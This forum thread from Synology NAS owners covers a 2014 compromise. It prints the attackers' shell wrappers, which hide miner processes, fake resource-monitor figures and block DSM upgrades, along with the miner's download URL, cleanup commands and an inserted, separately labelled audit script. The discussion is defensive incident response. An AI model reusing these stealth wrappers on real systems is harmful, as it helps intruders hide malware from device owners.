hacked resource Monitor
Forum rules
We've moved! Head over to Synology Community (community.synology.com) to meet up with our team and other Synology enthusiasts!
Re: hacked resource Monitor
I deleted the folders and files from root access.
Changed passwords - not sure what else to do. I can shut down access to Surveillance from the outside but that defeats the checking in I do while I am not there.
I should turn off remote management - that will be next.
None of it makes sense.
Re: hacked resource Monitor
Same problem here. More info in a Facebook post:
https://www.facebook.com/synology/posts ... 7533142897
I had the web server (port 80) and DSM https on port 5001 running. All blocked now. Entry was probably one of them.
Re: hacked resource Monitor
With the amount of changed files it is pretty apparent that we need to reinstall the system. How do we back up all settings and configs and reinstall, without losing /volume1? Is it even possible?
Also, we need to know how they got in and that the security hole is blocked.
Please Synology, reply to these posts, at least that you have seen this and are working on it.
Re: hacked resource Monitor
I removed the /PWNED directory and mv:ed back the changed .cgi files you mention above. I also updated the DSM to latest and rebooted. Works fine. I am about to manually update the DSM again now with the downloaded .pat file to try to make sure that the system files get reinstalled, as the upgrade.cgi file seems changed.
severed wrote: I too have found I have been hacked and my resource monitor "tampered with" - I guess to hide the massive resource usage from the hackers who ran bitcoin mining software
I got suspicious when my RackStation started to seem really slow - I logged in via ssh and ran top and saw 3 processes using 25% CPU - they were called PWNEDm, going to an IP address of 46.244.18.176 on port 9555
It seems to download from here: http://65.36.55.70:5000/jynx2.so
I then noticed the PWNED folder -- I was able to kill the three tasks and delete the folder
The tasks were called PWNEDm - upon looking at this with a hex editor it is clearly just "mined" renamed - a BitCoin miner
What is scary is that they seem to know they were running on a DiskStation as some of the files/scripts appear to reference Synology file paths so they can overwrite files and hide their presence.
I am reluctant to reboot as maybe some Synology files are damaged -- I can already see a few scripts such as:
top.cgi:
#!/bin/sh
/usr/syno/synoman/webman/modules/ResourceMonitor/top2.cgi | awk -v RS='[^\n]*\n*[^\n]*(PWNED|top2.cgi)([^\n]*\n){6}' '{print}' ORS=""
upgrade.cgi:
#!/bin/sh
/usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade2.cgi | sed -e 's/\("available_for_download" *: *\).*,/\1 false,/'
rsrcmonitor3.cg1:
#!/bin/sh
rand1=$((RANDOM%10))
rand2=$((RANDOM%10))
rand3=$((RANDOM%10))
rand4=$((RANDOM%10))
rand5=$((RANDOM%10))
rand6=$((RANDOM%10))
/usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor3.cgi | sed -e "s/\(\"15minLoad\" *: *\)[0-9]*\(,*\)/\1$rand1\2/" -e "s/\(\"1minLoad\" *: *\)[0-9]*\(,*\)/\1$rand2\2/" -e "s/\(\"5minLoad\" *: *\)[0-9]*\(,*\)/\1$rand3\2/" -e "s/\(\"OtherLoad\" *: *\)[0-9]*\(,*\)/\1$rand4\2/" -e "s/\(\"SystemLoad\" *: *\)[0-9]*\(,*\)/\1$rand5\2/" -e "s/\(\"UserLoad\" *: *\)[0-9]*\(,*\)/\1$rand6\2/"
These appear to overwrite some Synology files.
Before I reboot, what I would like to know is: if I look at all the scripts and note down all the files they modify, could I copy "clean" files from my DS214+ to my RackStation 2212+?
I do have a pretty tight password set too -- containing numbers, letters and some punctuation chars -- very weird!
If anyone wants the whole PWNED folder I kept a copy and can email it, or go to my blog: http://thesbsguy.com/?p=244
Sev
Re: hacked resource Monitor
Sadly I could not do a manual upgrade as it says my upgrade file is older than the one I have. It should actually be of the same version. Or the hack prevents me from a manual upgrade, somehow.
Gozem wrote: I removed the /PWNED directory and mv:ed back the changed .cgi files you mention above. I also updated the DSM to latest and rebooted. Works fine. I am about to manually update the DSM again now with the downloaded .pat file to try to make sure that the system files get reinstalled, as the upgrade.cgi file seems changed.
Re: hacked resource Monitor
There seem to be three rsrcmonitor*.cgi files on my system. rsrcmonitor2.cgi calls rsrcmonitor3.cgi with some random load generated from an .sh script. However, files 1 and 3 are binaries. Which one is correct, and what should they be named? Currently I renamed 3.cgi to 2.cgi, overwriting the sh script, just as I did with the other files.
Seems to be working correctly after a reboot as far as I can tell.
Re: hacked resource Monitor
Asking a friend who has the same (unhacked) system as I do, and the two rsrcmonitor files seem legit:
Gozem wrote: There seem to be three rsrcmonitor*.cgi files on my system. rsrcmonitor2.cgi calls rsrcmonitor3.cgi with some random load generated from an .sh script. However, files 1 and 3 are binaries. Which one is correct, and what should they be named? Currently I renamed 3.cgi to 2.cgi, overwriting the sh script, just as I did with the other files.
Seems to be working correctly after a reboot as far as I can tell.
> ls -l /usr/syno/synoman/webman/modules/ResourceMonitor
-rw-r--r-- 1 root root 1944 Aug 23 15:33 config
-rw-r--r-- 1 root root 152 Aug 23 15:33 helptoc.conf
drwxr-xr-x 7 root root 4096 Oct 20 10:08 images
-rw-r--r-- 1 root root 179 Aug 23 15:33 index.conf
-rw-r--r-- 1 root root 92150 Aug 23 15:33 resource.js
-rwxr-xr-x 1 root root 86952 Oct 8 09:09 rsrcmonitor.cgi
-rwxr-xr-x 1 root root 61568 Oct 8 09:09 rsrcmonitor2.cgi
-rwxr-xr-x 1 root root 24956 Oct 8 09:09 setting.cgi
-rwxr-xr-x 1 root root 14882 Aug 23 15:33 style.css
-rwxr-xr-x 1 root root 15644 Oct 8 09:09 top.cgi
Re: hacked resource Monitor
That one is indeed legit and should be renamed back to rsrcmonitor2.cgi
Luckily they were lazy and just renamed the original files.
The new files are just executing the original files and then modifying the output (hiding the PWNED processes)
In my case the new files were all with user id 502 and group id 20
You can try and do a recursive search on /:
find / -user 502 -print
I myself didn't find any other files.
As for the failed upgrade, you might want to try and edit the version number of the update (smallfixnumber). The firmware .pat files are just compressed files which can be extracted like a zip (just rename to firmware.zip); then edit the VERSION file to contain a higher number. After that compress everything, rename back to .pat and try to upgrade with that firmware.
Last edited by Doolbr on Mon Feb 10, 2014 9:50 pm, edited 2 times in total.
Re: hacked resource Monitor
I figured that the firmware Synology provides is the base firmware of 4.3-3810. To get update4 you have to patch via the DSM interface. I was probably trying to install DSM 4.3-3810 (update1 or 0).
Doolbr wrote: As for the failed upgrade, you might want to try and edit the version number of the update (smallfixnumber). The firmware .pat files are just compressed files which can be extracted like a zip (just rename to firmware.zip); then edit the VERSION file to contain a higher number. After that compress everything, rename back to .pat and try to upgrade with that firmware.
But since no one else has found any more tampered/bad files I'll wait on bigger actions (full reinstall?) until we know how they came in, and that the security hole is fixed.
Re: hacked resource Monitor
I also found a /PWNED directory on my DS412+. I deleted the directory, but am a little confused about all the changed files being mentioned here and what to do about it. Which rsrcmonitor*.cgi files are legit and which one(s) do I delete? Do I need to replace the legit/modified rsrcmonitor*.cgi files with clean ones, and if so, where can I find them?
I'm a bit of a Linux novice, and new to Synology devices. I just purchased my DS412+ last week. Not a real great feeling getting hacked less than a week into owning the device.
Re: hacked resource Monitor
I know nothing about the Linux system and commands; I am also running the headless CrashPlan package.
Not sure what else to do. I don't know how to organize the search for the file changes; too much data to back up, as I've been trying to get it into the cloud. Not sure what else to do.
Re: hacked resource Monitor
I will update this post when new info comes in.
Here is how you clean it (so far as I've detected on my DS1812+). Also note that this is not a guarantee that you are 100% clean. We (this thread and the linked Facebook thread) might have missed something.
NOTE: Do this at your own risk!
I write this from memory as I already cleaned out the files and can't test my instructions again.
1. Either disconnect the Synology from the Internet or configure a Firewall in DSM in the Control Panel. Either way, a very angry Firewall (especially on ports 80, 443, 5000 and 5001) is the bare minimum since we do not know if this security hole is fixed or not. You might just get infected again.
2. Enable ssh and log in using a command shell in Linux/Mac OSX (or get putty for Windows) as root@your-diskstations-ip with the same password as the user "admin" has.
3. All altered files seem to be owned by user id 502. Run:
find / -xdev -user 502
Post the result here so we can investigate further.
The above command will search for files starting in / (the root) and look for files with user id 502. -xdev means that it should not enter into newly mounted disks, like /volume1, which might take a LOOOONG time if you have a lot of files.
4. Kill the bitcoin mining processes. You can easily see them eating the CPU using the command 'top'. Press q to exit top.
Run:
killall PWNEDm
Possibly also run (I can't remember if there was one more process running or not):
killall PWNEDb
Use the following to search for PWNED processes and kill them:
ps |grep PWNED
5. Remove the /PWNED directory:
rm -r /PWNED
6. Move back the 3 .cgi files that have been moved and are being called from new hacked copies:
Check that the target files you are about to overwrite are actually shell files (yes, note the 2.cgi one):
more /usr/syno/synoman/webman/modules/ResourceMonitor/top.cgi
more /usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade.cgi
more /usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor2.cgi
Move back the original files. Note the change in numbers on the last one.
mv /usr/syno/synoman/webman/modules/ResourceMonitor/top2.cgi /usr/syno/synoman/webman/modules/ResourceMonitor/top.cgi
mv /usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade2.cgi /usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade.cgi
mv /usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor3.cgi /usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor2.cgi
The forum seems to format the above a bit strangely, but it is a normal mv command.
7. Possibly reboot your station here to make sure DSM runs on the good .cgi files.
8. Update your DSM to latest.
9. Look for more infections I've read about but did not have myself. I don't know what to do with it exactly if you find it. Probably remove it.
Look for the directory /volume1/startup
All files that have been altered seem to be from the user with id 502.
Try to find more files:
find / -user 502
If you have a lot of files on your diskstation that will take a LONG time. To only search in the DSM system areas use:
find / -xdev -user 502
Please post replies on any errors in my instructions, additions or other help you need.
Last edited by Gozem on Tue Feb 11, 2014 12:16 pm, edited 2 times in total.
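The following script is an added example, not code posted by anyone in this thread, that automates the checks Doolbr and Gozem describe above: walk a DSM webman modules tree, flag any .cgi that is a shell script (the genuine ones are ELF binaries), show which renamed sibling such a wrapper invokes, and flag files owned by uid 502. The function names, the --demo switch and the sample tree built by make_sample_tree (fake ELF stubs plus two wrappers shaped like the posted ones) are assumptions of this example; the uid and the *2.cgi/*3.cgi naming come from the posts.

```shell
#!/bin/sh
# Added example (not from the thread). Audits a tree of DSM .cgi files for the
# wrapper-script pattern described above. Assumptions: uid 502 and the renamed
# "*2.cgi"/"*3.cgi" originals are taken from the posts; everything built by
# make_sample_tree is constructed for demonstration only.

# Build a constructed sample tree under $1 that mimics the layout in the thread:
# four fake ELF binaries and two wrapper scripts that pipe a renamed sibling
# through sed, exactly the shape of the posted top.cgi/upgrade.cgi/rsrcmonitor2.cgi.
make_sample_tree() {
    root=$1
    rm_dir="$root/ResourceMonitor"
    cp_dir="$root/ControlPanel/modules"
    mkdir -p "$rm_dir" "$cp_dir"
    # Fake ELF headers stand in for the real binaries (constructed, not DSM code).
    for b in "$rm_dir/rsrcmonitor.cgi" "$rm_dir/rsrcmonitor3.cgi" \
             "$rm_dir/top.cgi" "$cp_dir/upgrade2.cgi"; do
        printf '\177ELF-placeholder\n' > "$b"
    done
    # Wrapper scripts: run the renamed original and rewrite its output.
    printf '#!/bin/sh\n%s/rsrcmonitor3.cgi | sed -e "s/x/y/"\n' "$rm_dir" \
        > "$rm_dir/rsrcmonitor2.cgi"
    printf '#!/bin/sh\n%s/upgrade2.cgi | sed -e "s/x/y/"\n' "$cp_dir" \
        > "$cp_dir/upgrade.cgi"
    chmod 755 "$rm_dir"/*.cgi "$cp_dir"/*.cgi
}

# Print one line per suspicious .cgi under $1:
#   SCRIPT  <path>  calls: <first .cgi path referenced inside the script>
#   UID502  <path>
# Returns 0 when nothing suspicious was found, 1 otherwise.
audit_cgi_tree() {
    dir=$1
    hits=0
    while IFS= read -r f; do
        [ -n "$f" ] || continue
        # A genuine DSM .cgi starts with the ELF magic; a "#!" header means a
        # shell wrapper was dropped in its place.
        magic=$(head -c 2 "$f")
        if [ "$magic" = "#!" ]; then
            # The wrapper normally invokes the renamed original; show which one.
            target=$(grep -o '/[^ |"]*\.cgi' "$f" | head -n 1)
            echo "SCRIPT  $f  calls: ${target:-?}"
            hits=$((hits + 1))
        fi
        # Numeric owner from ls -ln (column 3). Real files belong to root (0);
        # uid 502 was the owner of every dropped file reported in this thread.
        owner=$(ls -ln "$f" | awk '{print $3}')
        if [ "$owner" = "502" ]; then
            echo "UID502  $f"
            hits=$((hits + 1))
        fi
    done <<EOF
$(find "$dir" -type f -name '*.cgi' | sort)
EOF
    [ "$hits" -eq 0 ]
}

# Number of suspicious lines audit_cgi_tree reports for $1.
suspicious_count() {
    audit_cgi_tree "$1" | wc -l | tr -d ' '
}

# Real use on a DiskStation (the tree the thread's paths live in):
#   audit_cgi_tree /usr/syno/synoman/webman/modules
# Demo against the constructed tree: sh audit.sh --demo
if [ "${1:-}" = "--demo" ]; then
    demo=$(mktemp -d)
    make_sample_tree "$demo"
    audit_cgi_tree "$demo" || echo "suspicious files found: $(suspicious_count "$demo")"
    rm -rf "$demo"
fi
```

A SCRIPT hit is the case handled by step 6 of Gozem's list: the wrapper is replaced by the original it calls, and the output of `more` on the wrapper should match what the thread shows. The uid check cannot fire in the demo tree because creating files owned by uid 502 needs root; on a real box it complements `find / -xdev -user 502`.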
Re: hacked resource Monitor
Sorry, that was my mistake, it was uid 502
Luckily, I could still find it in my terminal backlog, added a screenshot:
> ls -l
-rw-r--r-- 1 root root 1944 Nov 5 22:53 config
-rw-r--r-- 1 root root 152 Nov 5 22:53 helptoc.conf
drwxr-xr-x 7 root root 4096 Nov 16 22:56 images
-rw-r--r-- 1 root root 179 Nov 5 22:53 index.conf
-rw-r--r-- 1 root root 92150 Nov 5 22:53 resource.js
-rwxr-xr-x 1 root root 86952 Nov 5 22:53 rsrcmonitor.cgi
-rwxr-xr-x 1 502 20 532 Feb 3 17:40 rsrcmonitor2.cgi
-rwxr-xr-x 1 root root 61568 Nov 5 22:53 rsrcmonitor3.cgi
-rwxr-xr-x 1 root root 24956 Nov 5 22:53 setting.cgi
-rwxr-xr-x 1 root root 14882 Nov 5 22:53 style.css
-rwxr-xr-x 1 root root 15644 Nov 5 22:53 top.cgi
Re: hacked resource Monitor
Here are a few bugs probably related to this:
http://www.cvedetails.com/vulnerability ... ology.html
http://web.nvd.nist.gov/view/vuln/detai ... -2013-6955
The release notes don't give many hints:
http://www.synology.com/en-global/relea ... del/DS1812+
Synology: Please highlight security issues better in your notes.
Re: hacked resource Monitor
I already had Update 3.
Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3